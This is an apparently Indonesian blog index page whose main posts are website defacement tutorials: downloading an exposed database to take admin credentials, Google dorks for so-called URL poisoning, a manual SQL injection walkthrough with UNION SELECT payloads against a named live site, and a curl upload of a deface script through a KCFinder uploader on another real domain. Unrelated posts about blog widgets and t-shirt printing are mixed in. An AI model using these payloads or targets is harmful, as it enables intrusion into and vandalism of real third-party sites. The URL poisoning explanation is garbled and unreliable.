Selasa, 25 Desember 2018

Tutorial Deface Dengan Cara Download Database SQL

Kali ini gw share tutorial deface ni gan
Deface Dengan Cara Download Database SQL

Sekilas gw jelasin

Jadi cara deface ini kita memanfaatkan dari si admin website tersebut, karena menyisipkan file database.sql nya di public_html :D
Saran gw untuk admin website lainnya, JANGAN PERNAH menyisipkan file yang penting di website, baik itu backup-an , database , user & password dll nya
Lalu sedikit saran lagi, File config dari website harus di ubah permission nya

file config berbagai macam jenis & namanya, gw jelasin nih , menurut sepengetahuan gw

CMS Wordpress = wp-config.php
CMS Joomla = configuration.php
CMS Lokomedia = Config.php

CMS nya gw gatau, tapi biasanya di
admin/models/db-settings.php
admin/includes/config.php

Nah itu dia sedikit penjelasan dari gw, ok lanjut ke topik
Yap jadi teknik deface ini bisa pakai Tools

Gw pakai tools scan directory download di http://trolling-system.blogspot.com/2018/03/bruteforce-files-directory-website.html, lalu mendapatkan sebuah ini


Yap itu adalah sebuah database website nya :D
Lalu gw cek, ternyata benar, lihat gambar



selanjutnya cari username , password admin dari website tersebut di database nya itu
gw dapat


Nah tinggal di hash passwordnya, lalu login deh ke webnya :D

gimna mudah bukan? klo kata gw sih susah wkwkw

Oke sekian gan tutorialnya :D
di Tidak ada komentar:
Label:

Tutorial Deface Dengan Cara URL Poisoning

ok kali ini saya akan share Deface Dengan Cara URL Poisoning 
Cara ini cukup mudah kok , langsung aja ya caranya :D

Sekilas gw jelasin sedikit apa itu URL Poisoning ??

URL Poisoning, juga dikenal sebagai ( Location Poisoning )
Adalah metode pelacakan perilaku pengguna Web dengan menambahkan nomor identifikasi (ID) ke alamat halaman URL (Uniform Resource Locator) baris browser Web ketika pengguna mengunjungi situs tertentu. Nomor ID ini kemudian dapat digunakan untuk menentukan halaman mana di situs yang dikunjungi pengguna sesudahnya. Menggabungkan informasi semacam ini dapat berguna untuk memahami bagaimana pengguna mendapatkan halaman, produk atau layanan apa yang mungkin mereka minati, dan menghubungkan perilaku pengguna dengan demografi. URL Poisoning menyerupai penggunaan cookie. Namun, dengan URL Poisoning, pengguna tidak memiliki cara mudah untuk memilih keluar. Server yang menggunakan URL Poisoning memberikan ID segera setelah halaman pertama situs dikunjungi. Browser Web kemudian menganggap ID ini sebagai bagian dari URL. ID tetap dan dicatat selama pengguna mengunjungi halaman lain di situs yang sama. Itu juga dapat tinggal dengan browser ketika pengguna mengunjungi situs web yang bekerja sama dengan situs asli dalam melacak urutan halaman pengguna. Karena pengguna mungkin tidak ingin siapa pun melacak halaman yang dikunjungi

Nah begitulah kira kira penjelasan singkat URL Poisoning nya :D


Sekarang kita lanjut ke tutornya, sangat mudah sekali caranya

Dork =

site:ua "j images jdownloads screenshots version php j"
site:ua "wp content uploads gravity forms index php option com jdownloads"
site:ua "plugins editors jce tiny mce plugins cfg contactform"
site:ua "cfg contactform"


Pertama kalian paste dork di atas ke search engine ( google )



ok kalian pilih salah satu website
sebagai contoh, gw ambil website yg urutan pertama muncul di google


Lalu buka, maka akan muncul tulisan berantakan seperti ini



Tinggal hapus semua semuanya, kecuali domain
contoh

website ini http://colesa.com.ua/wp-content/uploads/gravity_forms/index.php%3Foption%3Dcom_jdownloads%26Itemid%3D0%26view%3Dupload?sa=U&ved=0ahUKEwjU8MGIkPXPAhXLCiwKHVkYDGUQFgiQAzBV&usg=AFQjCNEewS94LeOvgtPPs1hWzS2WAUWNCA//media/system/index.php

Ubah jadi seperti ini, ( Ubah hacker indonesia jadi nick lo )

http://colesa.com.ua/hacked-by-hacker-indonesia

maka hasilnya



Berhasil kan? wkwk gampang ya cara nya :D

Cara deface ini gw dapat dari cxsecurity, linknya >> : https://cxsecurity.com/ascii/WLB-2018070069

Ok sekian gan tutorialnya :D
di Tidak ada komentar:
Label:

Tutorial Deface Dengan Cara SQL Injection Manual

kembali lagi bersama gue admin yg ganteng :v
Setelah sekian lama tidak posting artikel, ya maaf sibuk dengan sekolah ( adminnya masih sekolah gan ), teman, pelajaran , dan yang pasti pacar wwkwk

kali ini gue akan memberikan tutorial Deface Dengan Cara SQL Injection Manual
beberapa bulan lalu gue memberikan tutorial sqli dengan pakai SQLMAP, Nah sekarang gue memberikan caranya dengan cara manual

langsung aja ya gan, sans aja live target udh gue sediakan kok :D

LIVE TARGET : http://garudatransindonesia.com/artikel.php?id=9


1. Untuk inject nya lebih mudah pakai Mozilla firefox + hackbar ya :D

2. Masukkan payload ( ' ) *tanpa tanda kurung , di akhir URL, maka website akan blank, menandakan bahwa web tersebut vuln SQL Injection
http://garudatransindonesia.com/artikel.php?id=9'



3. Selanjutnya beri tanda ( -- - ) di akhir url, contoh seperti ini
http://garudatransindonesia.com/artikel.php?id=9'-- -
Jika web kembali menampilkan artikel secara normal, berarti vuln SQLI



4. Sekarang kita memakai order+by untuk mencari error nya dimana
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+2-- - = NO ERROR/ BLANK
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+5-- - = NO ERROR/ BLANK
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+6-- - = ERROR / BLANK



5. Karena order by error nya di nomor 6, sekarang kita union select , untuk mencari column nya di nomor berapa beri tanda ( . ) di belakang parameter nya
Union select di nomor 5, karena order by nya error di nomor 6
http://garudatransindonesia.com/artikel.php?id=.9'+UNION+ALL+SELECT+1,2,3,4,5-- -


6. Yap udh ketemu ya nomor column nya yaitu di angka 2, sekarang kita mencari tau user, database , dan version nya, caranya? kita beri basic statement di menu hackbar kalian
Atau juga bisa memakai payload ini, taruh di letak angka 2
Payload = CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())

http://garudatransindonesia.com/artikel.php?id=.9'+UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5-- -


7, Dan taraaaa, kita sudah mendapatkan user , database , dan version nya


User : u2232528_garudatrans@localhost
Database : u2232528_garuda
Version : 10.2.17-MariaDB

Untuk mencari table tablenya, tinggal hapus aja payload nya, lalu memakai DIOS yang tersedia di hackbar :D

Ok sekian...
Terimaasih sudah berkunjung
di Tidak ada komentar:
Label:

Minggu, 23 Desember 2018

Widget Recent Post Untuk AMP Dengan Next Prev



Widget Recent Post Untuk AMP Dengan Next Prev yang dimaksud adalah seperti pada demo berikut:







Demo

Untuk menyimpan widget recent post ini di sidebar blog AMP, silahkan copy kode berikut ini dan simpan di antara widget di sidebar melalui EDIT HTML.


         
           
              <
di Tidak ada komentar:
Label: , ,

Kamis, 20 Desember 2018

Penjelasan Lengkap mengenai Cetak Kaos DTG



Berikut ini akan kami jelaskan secara lengkap mengenai segala hal yang berkaitan dengan cetak kaos DTG, mulai dari peralatan, biaya, target pembeli, dan juga keuntungan dan kerugiannya menggunakan metode tersebut.


Apa itu Cetak Kaos dengan Metode DTG?

Pertama-tama akan kita bahas, apa itu yang dinamakan cetak kaos menggunakan metode DTG, dan seperti apa gambaran metode ini.

Metode
di Tidak ada komentar:
Label: ,

Selasa, 18 Desember 2018

Membuat Tombol Chat Whatsapp Melayang Di Blog Dengan SVG



Tombol ini saya buat dengan 2 versi yaitu menampilkan ikon dengan CSS dan menampilkan ikon dengan HTML. Tentu saja keduanya menggunakan ikon SVG.


1. Ikon dengan CSS
Dengan ini maka kode HTML menjadi lebih simpel karena tidak menggunakan kode HTML ikon SVG.

Simpan kode HTML berikut di atas kode


di Tidak ada komentar:
Label: , , , ,

KCFinder Upload Script Deface di Terminal dengan cURL

Naufal Ardhani - Hallo gaesss udah jarang jarang nih gua nulis di blog ini dan sekarang lagi pengen banget ngepost artikel di blog tapi masalahnya gua bingung mau nulis apa, dan tiba tiba aja kepikiran nulis Tutorial Deface POC KCFinder di Terminal dengan cURL.



  • Apa itu Kcfinder?
     KCFinder adalah salah satu plugin populer untuk web file management yang biasa diintegrasikan dengan editor tinymce, ckeditor dan masih banyak lagi yang biasa digunakan oleh para web master. Celah keamanan ini bahkan sampai di versi yang paling baru. Cek di http://kcfinder.sunhater.com untuk lihat. Sebenarnya ini bukanlah hal yang baru, tapi sebagian admin yang jarang update info banyak juga yang kena batunya. Saya sendiri masih mendapati beberapa instansi pemerintah, lembaga pendidikan, perusahaan dalam negeri yang berpotensi diserang dengan bug ini.


  • Apa itu cURL?
    cURL adalah proyek perangkat lunak komputer yang menyediakan pustaka dan alat baris perintah untuk mentransfer data menggunakan berbagai protokol.


Silahkan baca juga jika ingin lebih tau Upload File dengan cURL di Terminal.

Oke langsung aja ke Tutorialnya,,,, sebelum ke mengikuti Step siapkan dulu bahan yang diperlukan,

Bahan :
  • Script Deface ( Simpan di Directory Desktop ) ( Simpan dengan nama index.shtml )
  • Terminal / CMD 
Tested :
  • MAC OS X Yosemite
Step :
  1. Buka Terminalnya, ketik "cd Desktop" tanpa tanda petik.
  2. lalu ketik "curl -F 'Filedata=@index.shtml' https://site.com/[path]/kcfinder/upload.php / link", Tapi disini target saya sudah ada seperti berikut "curl -F "Filedata=@index.shtml" http://seribuguru.org/assets/kcfinder/upload.php"
  3. Berhasil atau tidak? silahkan cek webnya dengan tambahkan /files/ setelah /kcfinder/upload/, Contoh : http://seribuguru.org/assets/kcfinder/upload/files/index.shtml.



Sekian saja tutorial kali ini semoga sedikit bermanfaat ilmunya untuk menjadi Security Hunter :v
di Tidak ada komentar:
Label: , , , ,
Langganan: Postingan (Atom)

Update Template Premium Kompi Flexible Non AMP v8

Seperti kita ketahui bahwa kini kecepatan loading blog atau skor "hijau" pagespeed insight dijadikan faktor rangking di zaman inde...